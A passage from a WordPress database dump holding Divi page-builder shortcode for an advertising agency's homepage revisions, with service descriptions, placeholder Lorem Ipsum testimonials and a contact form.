ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-02 21:03:22','2020-08-02 21:03:22','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/02/134-revision-v1/',0,'revision','',0),(380,1,'2020-08-02 21:13:04','2020-08-02 21:13:04','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 